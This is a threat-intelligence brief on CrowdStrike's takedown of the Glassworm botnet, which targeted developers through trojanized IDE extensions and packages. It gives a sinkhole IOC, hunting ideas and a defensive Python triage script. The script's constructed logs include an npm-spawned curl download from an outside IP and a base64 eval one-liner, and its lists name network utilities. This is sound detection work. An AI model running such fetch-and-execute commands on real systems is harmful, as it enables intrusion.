5 min · critical

Disrupting Glassworm: Inside CrowdStrike’s Takedown of a Developer-Targeting Botnet

CrowdStrike, in collaboration with Google and Shadowserver, successfully dismantled the Glassworm botnet, a highly resilient threat targeting software developers. The threat actors utilized trojanized IDE extensions and malicious package dependencies to deploy GlasswormRAT, leveraging a complex C2 infrastructure spanning the Solana blockchain, BitTorrent DHT, and Google Calendar to maintain persistent access to developer environments.

Sens: Immediate · Conf: high · Analyzed: 2026-05-26 · Google

Authors: Counter Adversary Operations

Actors: Glassworm, GlasswormRAT

Source: CrowdStrike

IOCs · 1
  • ip: 164[.]92[.]88[.]210 (CrowdStrike-operated sinkhole IP address; beacons to this IP indicate a dormant Glassworm infection)

Detection / Hunter: Google

What Happened

Security researchers have taken down a global cyber threat known as Glassworm. This botnet specifically targeted software developers by hiding malware in popular coding tools (IDE extensions) and open-source software packages. By compromising developers, the attackers aimed to plant malicious code in the software that everyday businesses and consumers use. Now that the infrastructure has been sinkholed, organizations should check their network logs for connections to the sinkhole IP address published by the researchers to determine whether any of their developer machines were compromised.

Key Takeaways

  • CrowdStrike, Google, and Shadowserver successfully dismantled the Glassworm botnet by simultaneously disrupting its four resilient C2 channels.
  • Glassworm specifically targets software developers via trojanized VSCode extensions, malicious npm/Python packages, and poisoned GitHub repositories.
  • The botnet's C2 architecture utilized Solana blockchain memos, BitTorrent DHT, Google Calendar event titles, and direct VPS connections for extreme resilience.
  • Infected machines now beacon to a CrowdStrike-controlled sinkhole IP (164.92.88.210), which serves as a high-fidelity indicator of compromise.

Affected Systems

  • Windows
  • macOS
  • Linux
  • VSCode
  • Cursor
  • Positron
  • Windsurf
  • VSCodium
  • Node.js environments
  • Python environments

Attack Chain

The attack begins with initial access via trojanized IDE extensions or compromised npm/Python packages executing malicious scripts during installation. A first-stage loader is executed, which retrieves the second-stage payload (GlasswormRAT) using a highly resilient C2 resolution process involving the Solana blockchain, BitTorrent DHT, or Google Calendar. Once established, the RAT harvests developer credentials and uses them to poison additional GitHub repositories, perpetuating the supply chain compromise.

Detection Availability

  • YARA Rules: Yes
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: CrowdStrike

The article provides two YARA rules (CrowdStrike_GlasswormRat_01 and CrowdStrike_GlasswormDownloader_01) to identify the GlasswormRAT script and the obfuscated Python installer variant.

Detection Engineering Assessment

  • EDR Visibility: High. EDR solutions can monitor process executions spawned by package managers (npm, pip) and IDEs, and can detect the execution of obfuscated Python scripts or Node.js payloads.
  • Network Visibility: High. Infected hosts are currently beaconing to a known sinkhole IP address, so network-based detection is highly effective for identifying existing compromises.
  • Detection Difficulty: Moderate. The initial supply-chain infection is hard to detect proactively, but the sinkholed state makes identifying existing infections straightforward via network logs.

Required Log Sources

  • Network flow logs
  • DNS query logs
  • Process creation logs (Event ID 4688 / Sysmon Event ID 1)
  • File creation logs

Hunting Hypotheses

  • Hypothesis: Consider hunting for unexpected outbound network connections originating from developer tools (e.g., VSCode, Node.js, Python) to unusual external IPs or known sinkhole infrastructure.
    Telemetry: Network flow logs, EDR network events · ATT&CK stage: Command and Control · FP risk: Low
  • Hypothesis: Evaluate whether package manager processes (npm, pip) are spawning suspicious child processes, such as obfuscated scripts or unexpected network utilities, during dependency installation.
    Telemetry: Process creation logs · ATT&CK stage: Execution · FP risk: Medium

Control Gaps

  • Lack of strict egress filtering for developer workstations
  • Implicit trust in open-source package registries and IDE extension marketplaces

Key Behavioral Indicators

  • Connections to the known sinkhole IP
  • IDE extensions executing unusual child processes
  • Python or Node.js executing heavily obfuscated code from temporary directories
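The following script is an added example (not code from CrowdStrike or from the original page) that turns the two hunting hypotheses above and the behavioral indicators listed here into runnable triage logic. It runs over constructed flow and process-creation records embedded inline; the hostnames, timestamps, paths and non-sinkhole IPs (documentation ranges) are invented, and the `/tmp/pip-` exclusion is an assumed tuning choice for pip's build directories, not something the page states. Only the sinkhole address 164.92.88.210 is taken from the page's IOC list.

```python
"""Added hunting example for the Glassworm indicators described on this page.

Two constructed log samples (not real telemetry) are triaged against:
  1. outbound flows to the CrowdStrike sinkhole 164.92.88.210 (FP risk: Low),
  2. package managers (npm/pip) spawning network utilities or obfuscated
     interpreter calls, and interpreters executing from temp directories
     (FP risk: Medium).
"""
import re
from dataclasses import dataclass

SINKHOLE_IP = "164.92.88.210"  # IOC from the page; any beacon here is a dormant infection

PACKAGE_MANAGERS = {"npm", "npm.cmd", "pip", "pip3", "pip.exe", "yarn", "pnpm"}
INTERPRETERS = {"node", "node.exe", "python", "python3", "python.exe"}
NETWORK_TOOLS = {"curl", "wget", "certutil.exe", "powershell.exe", "bitsadmin.exe"}
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/private/var/folders/", "\\temp\\", "\\appdata\\local\\temp\\")
# Assumed tuning exclusion: pip legitimately builds under /tmp/pip-* and would otherwise alert.
TEMP_ALLOWLIST = ("/tmp/pip-",)
OBFUSCATION_MARKERS = (
    re.compile(r"base64|b64decode|atob\(", re.I),
    re.compile(r"\beval\(|\bexec\(|Function\(", re.I),
    re.compile(r"[A-Za-z0-9+/=]{120,}"),  # long unbroken base64-looking blob
)

FLOW_FIELDS = ("ts", "host", "src_ip", "dst_ip", "dst_port", "process")
PROC_FIELDS = ("ts", "host", "parent_image", "image", "command_line")


@dataclass(frozen=True)
class Finding:
    host: str
    hypothesis: str  # which hunt fired
    evidence: str
    fp_risk: str     # mirrors the FP-risk column of the hunting table


def parse_csv_lines(text, fields):
    """Split constructed CSV lines; the last field (command line) may contain commas."""
    records = []
    for line in text.strip().splitlines():
        parts = line.split(",", len(fields) - 1)
        if len(parts) == len(fields):
            records.append(dict(zip(fields, parts)))
    return records


def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()


def looks_obfuscated(cmd):
    # Require two independent markers (e.g. base64 + eval) so ordinary build tooling stays quiet.
    return sum(1 for p in OBFUSCATION_MARKERS if p.search(cmd)) >= 2


def runs_from_temp(cmd):
    lower = cmd.lower()
    if any(a in lower for a in TEMP_ALLOWLIST):
        return False
    return any(t in lower for t in TEMP_DIRS)


def hunt_flows(flows):
    """Hypothesis 1: any connection to the sinkhole IP is a high-fidelity hit."""
    return [Finding(f["host"], "sinkhole-beacon",
                    f'{f["process"]} -> {f["dst_ip"]}:{f["dst_port"]}', "Low")
            for f in flows if f["dst_ip"] == SINKHOLE_IP]


def hunt_processes(procs):
    """Hypothesis 2 plus the temp-directory behavioral indicator."""
    findings = []
    for p in procs:
        parent, child, cmd = basename(p["parent_image"]), basename(p["image"]), p["command_line"]
        if parent in PACKAGE_MANAGERS and child in NETWORK_TOOLS:
            findings.append(Finding(p["host"], "pkgmgr-spawns-network-tool", cmd, "Medium"))
        elif parent in PACKAGE_MANAGERS and child in INTERPRETERS and looks_obfuscated(cmd):
            findings.append(Finding(p["host"], "pkgmgr-obfuscated-interpreter", cmd, "Medium"))
        elif child in INTERPRETERS and runs_from_temp(cmd):
            findings.append(Finding(p["host"], "interpreter-runs-from-temp", cmd, "Medium"))
    return findings


# Constructed sample telemetry: invented hostnames, documentation-range external IPs.
SAMPLE_FLOWS = """\
2026-05-26T10:01:02Z,dev-laptop-07,10.20.30.41,164.92.88.210,443,node
2026-05-26T10:01:05Z,dev-laptop-07,10.20.30.41,203.0.113.10,443,git
2026-05-26T10:02:11Z,build-agent-02,10.20.31.9,164.92.88.210,80,python3
2026-05-26T10:03:00Z,dev-laptop-12,10.20.30.55,198.51.100.22,443,node
"""
SAMPLE_PROCS = """\
2026-05-26T10:00:58Z,dev-laptop-07,/usr/local/bin/npm,/usr/bin/curl,curl -fsSL http://198.51.100.7/s1 -o /tmp/.s1
2026-05-26T10:00:59Z,dev-laptop-07,/usr/local/bin/npm,/usr/local/bin/node,node -e "eval(Buffer.from('aGVsbG8=','base64').toString())"
2026-05-26T10:01:00Z,dev-laptop-07,/usr/local/bin/npm,/usr/local/bin/node,node node_modules/.bin/tsc -p .
2026-05-26T10:02:09Z,build-agent-02,/usr/bin/pip3,/usr/bin/python3,python3 /tmp/pip-build-a1b2/setup.py install
2026-05-26T10:05:00Z,dev-laptop-12,/usr/bin/bash,/usr/bin/python3,python3 /tmp/xgz/loader.py
"""


def triage(flows_text=SAMPLE_FLOWS, procs_text=SAMPLE_PROCS):
    """Group findings by host so a responder sees which machines to isolate first."""
    findings = hunt_flows(parse_csv_lines(flows_text, FLOW_FIELDS))
    findings += hunt_processes(parse_csv_lines(procs_text, PROC_FIELDS))
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, []).append(f)
    return by_host


if __name__ == "__main__":
    for host, hits in sorted(triage().items()):
        print(f"{host}:")
        for h in hits:
            print(f"  [{h.fp_risk}] {h.hypothesis}: {h.evidence}")
```

On the sample data, both hosts that touched the sinkhole surface immediately from flow logs alone, which is why that hunt is rated Low for false positives. The process-lineage hunts need tuning: the pip build under /tmp/pip-* is allowlisted so the legitimate install does not fire, while the npm-spawned curl and the base64/eval one-liner do. Swap the two sample strings for exports from your own flow and Sysmon/EDR process telemetry in the same column order to run this against real data.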

False Positive Assessment

  • Low. The sinkhole IP is operated by CrowdStrike and has no legitimate use, so any beacon to it is a high-fidelity indicator of compromise. The process-lineage hunts carry more noise, since legitimate install scripts also spawn interpreters and network utilities, and should be tuned before alerting on them.

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Search network telemetry and firewall logs for any outbound connections to 164.92.88.210 to identify compromised developer workstations.
  • If your EDR supports it, consider isolating any hosts found communicating with the sinkhole IP pending a full forensic investigation.
  • Consider deploying the provided YARA rules to endpoint scanning tools to identify dormant Glassworm payloads.

Infrastructure Hardening

  • Evaluate whether egress network filtering can be tightened for developer VLANs to restrict outbound connections to only approved repositories and services.
  • Consider implementing private package registries and dependency proxy caches to scan and control open-source packages before they reach developer endpoints.

User Protection

  • If applicable, restrict the installation of IDE extensions to an approved list of vetted tools.
  • Enforce phishing-resistant MFA for all developer accounts, including GitHub, cloud platforms, and internal CI/CD systems.

Security Awareness

  • Educate development teams on the risks of typosquatting and malicious packages in open-source registries.
  • Train developers to review the permissions and publishers of IDE extensions before installation.

MITRE ATT&CK Mapping

  • T1195.001 - Supply Chain Compromise: Compromise Software Dependencies and Development Tools
  • T1059 - Command and Scripting Interpreter
  • T1102 - Web Service
  • T1008 - Fallback Channels
  • T1568 - Dynamic Resolution
  • T1078 - Valid Accounts